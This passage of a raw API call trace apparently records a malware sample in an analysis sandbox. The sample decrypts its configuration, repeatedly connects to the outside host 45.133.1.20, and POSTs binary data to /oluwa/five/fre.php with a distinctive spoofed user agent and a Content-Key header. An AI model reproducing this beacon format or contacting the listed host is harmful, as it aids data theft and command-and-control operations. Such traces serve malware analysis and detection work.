dwFlags=0x0) returned 1 [0187.226] GetProcessHeap () returned 0x6a0000 [0187.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0187.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.227] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0187.228] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.228] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0187.229] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.229] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0187.230] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.230] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0187.230] GetProcessHeap () returned 0x6a0000 [0187.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0187.234] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bf468*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be8f8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0187.234] GetProcessHeap () returned 0x6a0000 [0187.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0187.234] socket (af=2, type=1, protocol=6) returned 0x454 [0187.234] connect (s=0x454, name=0x6be8f8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0187.257] FreeAddrInfoW (pAddrInfo=0x6bf468*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be8f8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0187.257] GetProcessHeap () returned 0x6a0000 [0187.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0187.257] GetProcessHeap () returned 0x6a0000 [0187.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0187.258] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0187.259] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0187.259] GetProcessHeap () returned 0x6a0000 [0187.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b6de0 [0187.259] GetProcessHeap () returned 0x6a0000 [0187.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0187.260] GetProcessHeap () returned 0x6a0000 [0187.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0187.260] GetProcessHeap () returned 0x6a0000 [0187.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0187.261] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0187.261] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0187.261] GetProcessHeap () returned 0x6a0000 [0187.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b6ea0 [0187.261] GetProcessHeap () returned 0x6a0000 [0187.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0187.262] send (s=0x454, buf=0x6b6ea0*, len=242, flags=0) returned 242 [0187.262] send (s=0x454, buf=0x6bb998*, len=159, flags=0) returned 159 [0187.263] GetProcessHeap () returned 0x6a0000 [0187.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0187.263] recv (in: s=0x454, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0187.338] GetProcessHeap () returned 0x6a0000 [0187.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6ea0 | out: hHeap=0x6a0000) returned 1 [0187.339] GetProcessHeap () returned 0x6a0000 [0187.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0187.342] GetProcessHeap () returned 0x6a0000 [0187.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0187.342] GetProcessHeap () returned 0x6a0000 [0187.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0187.342] closesocket (s=0x454) returned 0 [0187.343] GetProcessHeap () returned 0x6a0000 [0187.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0187.343] GetProcessHeap () returned 0x6a0000 [0187.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0187.344] GetProcessHeap () returned 0x6a0000 [0187.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0187.344] GetProcessHeap () returned 0x6a0000 [0187.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0187.345] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x132c) returned 0x454 [0187.348] Sleep (dwMilliseconds=0xea60) [0187.349] GetProcessHeap () returned 0x6a0000 [0187.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0187.350] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.351] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0187.361] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.362] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0187.371] GetProcessHeap () returned 0x6a0000 [0187.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0187.371] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.372] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0187.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.373] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0187.374] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.377] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0187.377] GetProcessHeap () returned 0x6a0000 [0187.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0187.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.379] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0187.381] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.381] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0187.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.391] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0187.391] GetProcessHeap () returned 0x6a0000 [0187.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0187.391] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.392] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0187.393] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.393] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0187.394] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.394] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0187.395] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.396] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0187.396] GetProcessHeap () returned 0x6a0000 [0187.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0187.396] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0187.396] GetProcessHeap () returned 0x6a0000 [0187.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0187.400] GetProcessHeap () returned 0x6a0000 [0187.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0187.400] GetProcessHeap () returned 0x6a0000 [0187.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0187.401] GetProcessHeap () returned 0x6a0000 [0187.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0187.402] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.403] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0187.409] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.409] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0187.417] GetProcessHeap () returned 0x6a0000 [0187.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0187.421] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.421] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0187.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.423] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0187.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.424] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0187.424] GetProcessHeap () returned 0x6a0000 [0187.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0187.425] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.426] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0187.427] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.427] CryptDestroyKey (hKey=0x6ad060) returned 1 [0187.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.433] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0187.433] GetProcessHeap () returned 0x6a0000 [0187.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0187.434] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.434] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0187.435] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.435] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0187.436] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.437] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0187.438] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.438] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0187.438] GetProcessHeap () returned 0x6a0000 [0187.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0187.438] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bfe28*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be898*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0187.438] GetProcessHeap () returned 0x6a0000 [0187.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa00 [0187.438] socket (af=2, type=1, protocol=6) returned 0x458 [0187.439] connect (s=0x458, name=0x6be898*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0187.462] FreeAddrInfoW (pAddrInfo=0x6bfe28*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be898*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0187.462] GetProcessHeap () returned 0x6a0000 [0187.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0187.462] GetProcessHeap () returned 0x6a0000 [0187.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0187.463] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0187.467] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0187.467] GetProcessHeap () returned 0x6a0000 [0187.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b6de0 [0187.467] GetProcessHeap () returned 0x6a0000 [0187.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0187.468] GetProcessHeap () returned 0x6a0000 [0187.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0187.468] GetProcessHeap () returned 0x6a0000 [0187.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0187.469] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0187.470] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0187.470] GetProcessHeap () returned 0x6a0000 [0187.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b6ea0 [0187.470] GetProcessHeap () returned 0x6a0000 [0187.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0187.470] send (s=0x458, buf=0x6b6ea0*, len=242, flags=0) returned 242 [0187.471] send (s=0x458, buf=0x6bb998*, len=159, flags=0) returned 159 [0187.471] GetProcessHeap () returned 0x6a0000 [0187.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0187.471] recv (in: s=0x458, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0187.558] GetProcessHeap () returned 0x6a0000 [0187.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6ea0 | out: hHeap=0x6a0000) returned 1 [0187.558] GetProcessHeap () returned 0x6a0000 [0187.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0187.559] GetProcessHeap () returned 0x6a0000 [0187.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0187.559] GetProcessHeap () returned 0x6a0000 [0187.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0187.559] closesocket (s=0x458) returned 0 [0187.560] GetProcessHeap () returned 0x6a0000 [0187.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa00 | out: hHeap=0x6a0000) returned 1 [0187.560] GetProcessHeap () returned 0x6a0000 [0187.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0187.561] GetProcessHeap () returned 0x6a0000 [0187.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0187.561] GetProcessHeap () returned 0x6a0000 [0187.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0187.562] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x117c) returned 0x458 [0187.564] Sleep (dwMilliseconds=0xea60) [0187.568] GetProcessHeap () returned 0x6a0000 [0187.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0187.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.570] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0187.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.580] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0187.589] GetProcessHeap () returned 0x6a0000 [0187.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0187.591] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.591] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0187.592] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.597] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0187.598] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.599] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0187.599] GetProcessHeap () returned 0x6a0000 [0187.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0187.605] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.605] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0187.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.607] CryptDestroyKey (hKey=0x6ad520) returned 1 [0187.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.608] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0187.608] GetProcessHeap () returned 0x6a0000 [0187.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0187.613] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.614] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0187.615] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.615] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0187.616] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.617] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0187.618] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.618] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0187.618] GetProcessHeap () returned 0x6a0000 [0187.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0187.618] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0187.619] GetProcessHeap () returned 0x6a0000 [0187.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0187.619] GetProcessHeap () returned 0x6a0000 [0187.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0187.620] GetProcessHeap () returned 0x6a0000 [0187.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0187.620] GetProcessHeap () returned 0x6a0000 [0187.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0187.621] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.621] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0187.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.631] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0187.638] GetProcessHeap () returned 0x6a0000 [0187.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0187.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.639] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0187.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.640] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0187.641] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.641] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0187.641] GetProcessHeap () returned 0x6a0000 [0187.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0187.647] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.647] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0187.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.649] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0187.649] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.650] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0187.650] GetProcessHeap () returned 0x6a0000 [0187.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0187.650] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.651] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0187.652] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.652] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0187.653] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.653] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0187.654] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.655] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0187.655] GetProcessHeap () returned 0x6a0000 [0187.655] RtlAllocateHeap 